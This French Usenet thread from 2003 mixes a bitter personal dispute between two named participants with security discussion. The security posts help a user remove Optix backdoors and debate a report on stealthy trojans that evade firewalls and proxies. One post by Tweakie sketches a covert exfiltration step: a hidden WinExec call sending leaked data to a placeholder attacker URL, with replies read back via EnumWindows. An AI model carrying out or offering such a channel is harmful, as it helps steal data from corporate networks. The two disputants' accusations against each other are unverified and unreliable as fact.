>>Donc quel rapport ?
>
> Aucun rapport, vous mélangez plusieurs choses différentes
Je ne mélange rien, vous prétendez que mes soi-disant ragots seraient la
cause des problèmes de votre journal. Ensuite mes soi-disant ragots
porteraient sur un rapport ne vous concernant pas.....
C'est pas clair :-(
> (et oubliez
> vos accusations de propagation de fausses nouvelles).
Recommencez depuis le début mais cette fois exprimez vous clairement,
nous finirons bien par comprendre.
Roland Garcia
djehuti
> djehuti wrote:
>>> [couic] Tegam, que son étude prospective contenait
>>> une partie publicitaire, etc. :-((((((
>>
>> et c'était pas vrai ?
>
> Non, c'était mensonger.
t'as rien de plus sérieux que ton affirmation gratuite ?
merci
@tchao
Olivier Aichelbaum
> >>> [couic] Tegam, que son étude prospective contenait
> >>> une partie publicitaire, etc. :-((((((
> >>
> >> et c'était pas vrai ?
> >
> > Non, c'était mensonger.
>
> t'as rien de plus sérieux que ton affirmation gratuite ?
Consulte l'étude et tu verras.
--
Olivier Aichelbaum
djehuti
ouais, c'est bien ce que je pensais
aider les autres... c'est vraiment pas ton truc :-(
@tchao
Olivier Aichelbaum
> > Consulte l'étude et tu verras.
>
> ouais, c'est bien ce que je pensais
>
> aider les autres... c'est vraiment pas ton truc :-(
Je ne peux pas lire à ta place.
Ton ami M. Garcia s'est exprimé sur cette étude et a même dit qu'il
y avait une partie publicitaire dedans, demande lui qu'il te la
prête.
--
Olivier Aichelbaum
Olivier Aichelbaum
C'est très clair : vous avez porté, et portez encore, des accusations
mensongères contre moi. Si elles ne sont pas destinées à nuire, elles
sont destinées à quoi ?
--
Olivier Aichelbaum
Nicob
> Finalement, l'auteur mentionne l'hypothetique cheval de Troie pourrait
> etre sous la forme d'un plugin de browser ou de client mail, ou meme sous
> celle d'un ActiveX.
> Par contre, celui-ci n'a pu contourner un proxy HTTP avec
> authentification. Cependant, l'auteur precise qu'il eut-ete possible de
> renifler le mot de passe lors de son transit depuis le browser jusqu'au
> serveur web (NDT: S'il avait eu les memes lectures que Nicob, il aurait
> envisage' une autre technique).
Ben justement, ils semblent avoir envisagé la technique consistant à
faire du malware un "compagnon" du navigateur (plugin ou ActiveX) mais ils
ne semblent pas avoir suivi le raisonnement jusqu'au bout. Ceci leur
aurait permis de se rendre compte que le mot de passe du proxy était
connu du navigateur, et qu'ils n'avaient qu'à lui (le browser) demander
pour l'obtenir ...
Nicob
joke0
JuggernauT:
> j'ai supprimé ce programme mais j avais gardé une image ecran
> de la fenetre de AVG qui aparraissait quand stinger se mettait
> en route,texte ci-dessous:
Donc, AVG était toujours actif quand tu as lancé Stinger?
Il aurait fallu le désactiver pendant ce temps là (j'n'y
pensais plus :-[ )
> Virus Trojan horse Backdoor.Optix.BJ
> is found in file C:\Windows\system32\svhost.exe
Ce fichier existe-il toujours? Attention, svchost.exe qui est un
fichier windows, n'existe pas dans le répertoire
C:\Windows\system32\
> mais en mode normal j ai les mêmes embrouilles que mon post
> d'origine.
Si ton AVG ne trouve rien, alors il faudra penser à autre chose:
pb matériel, pb logiciel. La présence de la backdoor est
peut-être étrangère à tes ennuis.
--
joke0
Christian
>
> [...]
> Bonjour,
>
> Puisque vous en parlez, il me semble qu'on peut parler un peu
> plus serieusement de ce fameux rapport confidentiel depuis qu'une
> partie du contenu de celui-ci a ete' reproduite dans le Virus
> Bulletin de Juin 2003, et que certains d'entre vous ont lu
> (au passage, j'en profite pour remercier certain ).
>
> Pour ca, je vais tenter de resumer tres brievement l'article
> de E. Dotan (si des points de ce resume' ne sont pas clairs,
> n'hesitez pas a demander):
>
>
> J'espere n'avoir rien oublie' d'important. Dommage qu'on ne sache
> pas ce que le rapport confidentiel contenait en plus...
>
> Des commentaires ?
>
Oui, ce qui m'embête là-dedans, c'est qu'il n'est pas expliqué comment
la bébète est entrée dans l'ordi.
Un deuxième point est que, pour moi, un firewall n'est pas prévu pour
empêcher les malwares de sortir mais pour les empêcher d'entrer.
Je considère que si le malware, quel qu'il soit, est installé dans la
machine, qu'il soit actif ou non, la politique de sécurité est à revoir
car prise en défaut.
--
Christian
- Rendre mon mail gratuit pour m'écrire. -
djehuti
"Christian" <lot...@mailnongratuit.com> a écrit dans le message news:
3fb94842$0$13273$626a...@news.free.fr
>> Puisque vous en parlez, il me semble qu'on peut parler un peu
>> plus serieusement de ce fameux rapport confidentiel depuis qu'une
>> partie du contenu de celui-ci a ete' reproduite dans le Virus
>> Bulletin de Juin 2003, et que certains d'entre vous ont lu
>> (au passage, j'en profite pour remercier certain ).
>
> la bébète est entrée dans l'ordi.
et c'est, amha, un des points les plus "comiques" de cette pub... euh de ce
rapport
d'une terrible menace (oui, GoodLuck) qui pesait sur le monde... on en
arrive à un cheval de troie hyper-confidentiel visant une cible très précise
(du sur mesures)
la lecture de l'article sur la programmation d'un cheval de troie furtif
(par l'auteur de GoodLuck, himself :-D ) dans MISC #10, peut éventuellement
apporter un début de réponse
(coucher avec l'admin étant la méthode la plus crédible)
> Un deuxième point est que, pour moi, un firewall n'est pas prévu pour
> empêcher les malwares de sortir mais pour les empêcher d'entrer.
bah, c'est aussi bien que ça marche dans les deux sens
ça peut permettre, à de simples particuliers, d'éviter les ennuis
> Je considère que si le malware, quel qu'il soit, est installé dans la
> machine, qu'il soit actif ou non, la politique de sécurité est à
> revoir car prise en défaut.
malheureusement, rien n'est sûr à 100%
@tchao
Roland Garcia
> Oui, ce qui m'embête là-dedans, c'est qu'il n'est pas expliqué comment
> la bébète est entrée dans l'ordi.
Soit par une faille soit en lançant un exécutable, ce qui nous amène à
boucher les failles et à utiliser un bon anti-virus à jour.
Nous avons réinventé l'eau tiède.
Roland Garcia
Frederic Bonroy
> Oui, ce qui m'embête là-dedans, c'est qu'il n'est pas expliqué comment
> la bébète est entrée dans l'ordi.
Il faut imaginer que ça peut arriver. ;-)
Roland Garcia
> Roland Garcia wrote:
>>Recommencez depuis le début mais cette fois exprimez vous clairement,
>>nous finirons bien par comprendre.
>
> C'est très clair : vous avez porté, et portez encore, des accusations
> mensongères contre moi.
Ce n'est pas clair du tout, moi porter des accusations mensongères ?
> Si elles ne sont pas destinées à nuire, elles
> sont destinées à quoi ?
Vous vous embrouillez, ce point ne peut exister que si le premier
existe. Faites un effort de clarté que diable !!!!
Roland Garcia
Roland Garcia
Par génération spontanée ou code de 0 octet ça ne marche pas, quoique on
a bien essayé de nous les caser ceux là:-)
Ceci dit, s'il n'y a pas de faille réseau comment rendre ce code initial
indétectable ? dans l'étude précitée je ne vois rien de nouveau ni
indétectable.
Roland Garcia
JacK
Roland Garcia <roland...@wanadoo.fr> signalait:
'lut,
Tenir compte du fait que la majorité des fuites sur les rezo d'entreprises
ne viennent pas de l'extérieur mais de l'intérieur, volontairement ou non :
un simple portable connecter au rezo d'entreprise par exemple. Le cas
dernièrement à l'EDF, je ne sais plus combien de postes infecté par un brave
ver. Un FW à règles en plus d'un AV à jour sur *tous* les postes du rezo
filtrant le OUT, ça fait aussi partie d'une stratégie de sécurité globale,
aussi bien que le non accès aux machines sensibles, serveurs, routeurs,....
--
http://www.optimix.be.tf /MVP WindowsXP/ http://websecurite.org
http://www.msmvps.com/XPditif/
*Helping you void your warranty since 2000*
---***ANTISPAM***---
Click on the link to answer - Cliquez sur le lien pour répondre
http://www.cerbermail.com/?p3GpATw2X4
@(*0*)@ JacK
Olivier Aichelbaum
Vous m'avez accusé de diffuser des fausses nouvelles, de "flasher
votre Bios" avec des EXE suspectes d'etre trojanises sur notre site,
de commenter faussement des decisions de justice, d'être un
journaliste à solde de untel ou untel, et j'en passe et des meilleures.
Vous prétendez que ce n'est pas clair ?
--
Olivier Aichelbaum
JuggernauT
liste de ce que j'ai eu comme sal*peries sur mon ordi
(attention au choc)
Bck/Optix.50 ,Bck/Optix.Pro.131.A ,Exploit/iFrame ,W32/Gibe.C.worm
et ceci en trois exemplaires au moins chacun ......à divers endroits....
(g longuement bidouillé et g reussi a lancer les antivirus online de panda
et trend ........et g desinfecté tout ces vilains trucs)
ca m as prit que 28 heures pour resoudre ca ....VIVE CE NG !!!!!!!!
merci joke0 et merci aux autres :)
"joke0" <404pagenot...@caramail.com> a écrit dans le message de
news: XnF9436E70...@joke0.net...
Roland Garcia
> Vous m'avez accusé de diffuser des fausses nouvelles, de "flasher
> votre Bios" avec des EXE suspectes d'etre trojanises sur notre site,
> de commenter faussement des decisions de justice, d'être un
> journaliste à solde de untel ou untel, et j'en passe et des meilleures.
>
> Vous prétendez que ce n'est pas clair ?
Non ce n'est pas clair.
Dans tout ce fouillis il y a des accusations vraies et pour d'autres cas
pas d'accusation du tout. Il n'y a en tout cas aucune accusation fausse.
Roland Garcia
joke0
JuggernauT:
> et ceci en trois exemplaires au moins chacun ......à divers
> endroits....
Avoir des bestioles sur son pc ne signifie pas forcément être
infecté ;-)
> ca m as prit que 28 heures pour resoudre ca
Il s'agit de prendre de bonnes habitudes maintenant:
http://www.lacave.net/~jokeuse/usenet/faq-fcsv.html#a3.5
--
joke0
Olivier Aichelbaum
> > Vous m'avez accusé de diffuser des fausses nouvelles, de "flasher
> > votre Bios" avec des EXE suspectes d'etre trojanises sur notre site,
> > de commenter faussement des decisions de justice, d'être un
> > journaliste à solde de untel ou untel, et j'en passe et des meilleures.
> >
> > Vous prétendez que ce n'est pas clair ?
>
> Non ce n'est pas clair.
>
> Dans tout ce fouillis il y a des accusations vraies
Bref, vous persistez à calomnier.
--
Olivier Aichelbaum
Roland Garcia
>>
>>Dans tout ce fouillis il y a des accusations vraies
>
> Bref, vous persistez à calomnier.
Non, calomnier, c'est quand c'est faux.
Roland Garcia
Olivier Aichelbaum
> >>Dans tout ce fouillis il y a des accusations vraies
> >
> > Bref, vous persistez à calomnier.
>
> Non, calomnier, c'est quand c'est faux.
Pour la n-ième fois, je maintiens que je n'ai jamais été lié à une
société de logiciel antiviral, n'ai jamais diffusé d'EXE qui "vont
flasher le Bios" sur notre site, pas plus commenté faussement de
décision de justice, encore moins diffusé de fausse nouvelle, etc.
Effet mirroir : vous, vous avez été consultant pour Alphasys le
distributeur KAV, vous avez dit que leur concurent Tegam allait
couler (fausse nouvelle), que ce Tegam avait racheté Secusys
(fausse nouvelle), qu'un EXE allait flasher les Bios sur notre
site (fausse nouvelle), que le TGI disait du bien de fcsv
(où ça ? je n'ai lu aucun rapport -sic- de ce genre), etc.
A votre place j'aurais présenté mes excuses.
--
Olivier Aichelbaum
Roland Garcia
> je n'ai pas plus commenté faussement de
> décision de justice, encore moins diffusé de fausse nouvelle, etc.
Si.
> Effet mirroir : vous, vous avez été consultant pour Alphasys le
> distributeur KAV, vous avez dit que leur concurent Tegam allait
> couler
Qui a dit ça ?
Roland Garcia
Olivier Aichelbaum
> > je n'ai pas plus commenté faussement de
> > décision de justice, encore moins diffusé de fausse nouvelle, etc.
>
> Si.
Nous avons informé la justice de vos dires.
--
Olivier Aichelbaum
Roland Garcia
>
> Nous avons informé la justice de vos dires.
A 3h 27 du matin ? :-)
Roland Garcia
Olivier Aichelbaum
>
> > Nous avons informé la justice de vos dires.
>
> A 3h 27 du matin ? :-)
Vous aviez déjà tenus ces propos dans le passé.
--
Olivier Aichelbaum
Roland Garcia
>>A 3h 27 du matin ? :-)
>
> Vous aviez déjà tenus ces propos dans le passé.
A quelle date et sous quelle forme avez vous "informé"? où peut-on
vérifier ?
Roland Garcia
Olivier Aichelbaum
> A quelle date et sous quelle forme avez vous "informé"? où peut-on
> vérifier ?
J'ai posé la question le premier :
Pas eu de réponse.
--
Olivier Aichelbaum
Roland Garcia
> J'ai posé la question le premier :
>
> news:3FB8CA85...@acbm.com
>
> Pas eu de réponse.
Oh le menteur:
http://www.google.fr/groups?selm=b282vc%24kti%241%40tem.asynchrone.net&oe=UTF-8&output=gplain
patience ©
Roland Garcia
Olivier Aichelbaum
> > J'ai posé la question le premier :
> >
> > news:3FB8CA85...@acbm.com
> >
> > Pas eu de réponse.
>
> Oh le menteur:
> http://www.google.fr/groups?selm=b282vc%24kti%241%40tem.asynchrone.net&oe=UTF-8&output=gplain
Je n'y vois pas vos "fcsv est très bien" d'hier, etc.
PS http://www.google.fr/groups?selm=3E47B066.E94B8AB7%40acbm.com
--
Olivier Aichelbaum
Roland Garcia
>>Oh le menteur:
>>http://www.google.fr/groups?selm=b282vc%24kti%241%40tem.asynchrone.net&oe=UTF-8&output=gplain
>
> Je n'y vois pas vos "fcsv est très bien" d'hier, etc.
Vous n'avez pas lu le rapport ? ©
Roland Garcia
Olivier Aichelbaum
> >>http://www.google.fr/groups?selm=b282vc%24kti%241%40tem.asynchrone.net&oe=UTF-8&output=gplain
> >
>
> Vous n'avez pas lu le rapport ? ©
Je n'ai pas entendu parler de rapport, seulement d'une ordonnance.
--
Olivier Aichelbaum
Roland Garcia
> Effet mirroir : vous, vous avez été consultant pour Alphasys le
> distributeur KAV, vous avez dit que leur concurent Tegam allait
> couler (fausse nouvelle)
Qui a dit ça ? serait-ce une de vos nombreuses "fausses nouvelles" © ?
Roland Garcia
Roland Garcia
>>Vous n'avez pas lu le rapport ? ©
>
> Je n'ai pas entendu parler de rapport, seulement d'une ordonnance.
Manque de bol il est prévu par la même ordonnance.
PS: il est formel et d'une clarté limpide, il n'y a strictement aucun
dénigrement là où vous en voyez des centaines.
Roland Garcia
Olivier Aichelbaum
> >>Vous n'avez pas lu le rapport ? ©
> >
> > Je n'ai pas entendu parler de rapport, seulement d'une ordonnance.
>
> Manque de bol il est prévu par la même ordonnance.
>
> PS: il est formel et d'une clarté limpide, il n'y a strictement aucun
> dénigrement là où vous en voyez des centaines.
M. Garcia, respectez la chronologie, on vous parle de ce qui
a _précédé_ le référé !
PS Ce référé ne concerne pas les dénigrements contre ma société et moi.
--
Olivier Aichelbaum
Roland Garcia
> M. Garcia, respectez la chronologie
Tout à fait, et donc très légitimement vous savez ce que je vous dis ?
Roland Garcia
Tweakie
On Mon, 17 Nov 2003, Nicob wrote:
> Ben justement, ils semblent avoir envisagé la technique consistant à
> faire du malware un "compagnon" du navigateur (plugin ou ActiveX) mais ils
> ne semblent pas avoir suivi le raisonnement jusqu'au bout. Ceci leur
> aurait permis de se rendre compte que le mot de passe du proxy était
> connu du navigateur, et qu'ils n'avaient qu'à lui (le browser) demander
> pour l'obtenir ...
>
C'est juste mentionne' dans l'article : tandis qu'ils semblent avoir
ecrit des PoC pour les autres techniques, ils n'ont pas approfondi
celle-la. Il y a aussi selon moi une autre difference entre plugins,
ActiveX et ta technique qui, du point de vue de la furtivite', a
une certaine importance. Le browser/client de mail/whatever "connait"
ses plugins ou les ActiveX qu'il est succeptible d'utiliser. C'est
ce qui permet a des applcations comme Spybot S&D de lister facilement
ce type d'add-on. Ca n'est pas tres furtif. Dans ta methode, l'application
servant de mandataire ne fait que repondre a une requete d'une application
cliente. En un sens, ca me parait plus furtif.
Tu me diras peut-etre qu'il est toujours possible d'enregistrer un
ActiveX le temps d'effectuer les operations necessaires et de le
de-enregister apres, mais je prefere quand-meme ta technique (BHOs
et ActiveX etant utilises par pas mal de spywares, ils sont devenus
suspects), ses seuls inconvenients etant qu'elle repose sur l'utilisation
d'IE (condition generalement satisfaite*) et, plus delicat, la non prise
en charge du demarrage au boot. Reste aussi, je suppose, a dissimuler
les fichiers sur le disque et dans la liste des taches, Et bien-sur, ca
regle tous les problemes de proxies.
*Quoique, je persiste, on pourrait aussi (je sais, j'ai qu'a le
faire):
- Recuperer par exemple l'application pointee par
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html
- Faire en sorte que la backdoor lance celle-ci via un bete
WinExec(application http://site.attaquant.com?info=leak,SW_HIDE) ;
- Recup la reponse par exemple dans le titre de la fenetre corresp.
via un EnumWindows.
--
Tweakie
Olivier Aichelbaum
> > Effet mirroir : vous, vous avez été consultant pour Alphasys le
> > distributeur KAV, vous avez dit que leur concurent Tegam allait
> > couler (fausse nouvelle)
>
> Qui a dit ça ? serait-ce une de vos nombreuses "fausses nouvelles" © ?
Oups, j'ai inversé deux personnes, mes excuses !
(je devrais faire des fiches © ;)
PS je maintiens tout le reste.
--
Olivier Aichelbaum
Roland Garcia
> Roland Garcia wrote:
>>Qui a dit ça ? serait-ce une de vos nombreuses "fausses nouvelles" © ?
>
>
> Oups, j'ai inversé deux personnes, mes excuses !
Des "fausses nouvelles"© non intentionnelles en quelque sorte .....
Roland Garcia
Olivier Aichelbaum
>
> >>Qui a dit ça ? serait-ce une de vos nombreuses "fausses nouvelles" © ?
> >
> > Oups, j'ai inversé deux personnes, mes excuses !
>
> Des "fausses nouvelles"© non intentionnelles en quelque sorte .....
une erreur isolée (aucun rapport avec le délit volontaire
systématique dont vous m'avez accusé précédemment).
quant à vous s'il s'agissait d'erreurs et non de volonté délibérée
de nuire, vous auriez aussi présenté vos excuses ?
espérons qu'il ne s'agit que d'un retard qui sera rapidement comblé :-)
--
Olivier Aichelbaum
djehuti
3FBA2ED8...@acbm.com
> quant à vous s'il s'agissait d'erreurs et non de volonté délibérée
> de nuire, vous auriez aussi présenté vos excuses ?
> espérons qu'il ne s'agit que d'un retard qui sera rapidement comblé
> :-)
bah, peut être quand tu te seras excusé et que tu auras réparé tes "erreurs
malheureuses" (pourtant reconnues comme *abus du réseau*)
@tchao
Roland Garcia
> espérons qu'il ne s'agit que d'un retard qui sera rapidement comblé :-)
Patience ©
Roland Garcia
Olivier Aichelbaum
> > quant à vous s'il s'agissait d'erreurs et non de volonté délibérée
> > de nuire, vous auriez aussi présenté vos excuses ?
> > espérons qu'il ne s'agit que d'un retard qui sera rapidement comblé
> > :-)
>
> bah, peut être quand tu te seras excusé et que tu auras réparé tes "erreurs
> malheureuses" (pourtant reconnues comme *abus du réseau*)
Pour mes rares erreurs je me suis déjà excusé.
Il ne pourra y avoir un apaisement que si vous y mettez aussi
du vôtre. La balle est dans votre camp.
--
Olivier Aichelbaum
Tweakie
On Mon, 17 Nov 2003, djehuti wrote:
>
> d'une terrible menace (oui, GoodLuck) qui pesait sur le monde... on en
> arrive à un cheval de troie hyper-confidentiel visant une cible très précise
> (du sur mesures)
>
> la lecture de l'article sur la programmation d'un cheval de troie furtif
> (par l'auteur de GoodLuck, himself :-D ) dans MISC #10, peut éventuellement
> apporter un début de réponse
> (coucher avec l'admin étant la méthode la plus crédible)
>
AMHA, la question qui se pose est surtout : pourquoi ce rapport etait-il
confidentiel ? Maintenant, le contenu est publie' dans le Virus Bulletin
et va vraissemblablement l'etre dans MISC, par petits bouts. Et qu'on
aille pas invoquer une politique de "disclosure" responsable, je n'y
crois pas une seconde.
> > Un deuxième point est que, pour moi, un firewall n'est pas prévu pour
> > empêcher les malwares de sortir mais pour les empêcher d'entrer.
>
> bah, c'est aussi bien que ça marche dans les deux sens
> ça peut permettre, à de simples particuliers, d'éviter les ennuis
>
Pas qu'a de simples particuliers : sur un reseau bien configure',
c'est a dire bloquant un certain nombre de flux en sortie et utilisant
des proxies avec authentification pour les autres, on aura besoin d'une
backdoor de type JAB (i.e. qui fait du tunneling sur un des protocoles
autorises a sortir et qui, du point de vue de l'authentification,
profite d'un logiciel client) pour faire sortir des informations
depuis des postes clients d'un reseau d'entreprise et entrer des
instructions destinees a la backdoor.
> > Je considère que si le malware, quel qu'il soit, est installé dans la
> > machine, qu'il soit actif ou non, la politique de sécurité est à
> > revoir car prise en défaut.
>
> malheureusement, rien n'est sûr à 100%
>
La seule politique de securite' qui puisse etre vraiment efficace contre
cette menace est l'education des utilisateurs . Reste a savoir s'il est
possible de faire confiance a l'ensemble des membres de celui-ci.
Comment etre sur qu'aucun ne cliquera sur un fichier .shm recu d'un
"collegue", si l'email qui l'y invite est bien presente' ?
--
Tweakie